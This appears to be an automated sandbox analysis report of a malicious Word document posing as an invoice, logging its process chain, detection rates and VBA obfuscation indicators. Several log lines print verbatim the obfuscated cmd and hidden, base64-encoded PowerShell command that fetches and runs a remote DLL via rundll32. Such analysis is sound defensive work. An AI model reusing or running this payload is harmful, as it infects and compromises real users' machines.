Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: Invoice 6682363.doc Virustotal: Detection: 52%
Source: Invoice 6682363.doc Metadefender: Detection: 43%
Source: Invoice 6682363.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbx source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2102635935.000000001B460000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Invoice 6682363.doc Initial sample: OLE summary subject = Human Awesome interface XSS Electronics, Kids & Garden Frozen Incredible Metal Chips application hacking Baby & Health Rwanda

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dzbky2bhynftefpvl Name: Dzbky2bhynftefpvl
Document contains an embedded VBA with many randomly named variables
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dzbky2bhynftefpvl Name: Dzbky2bhynftefpvl
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfA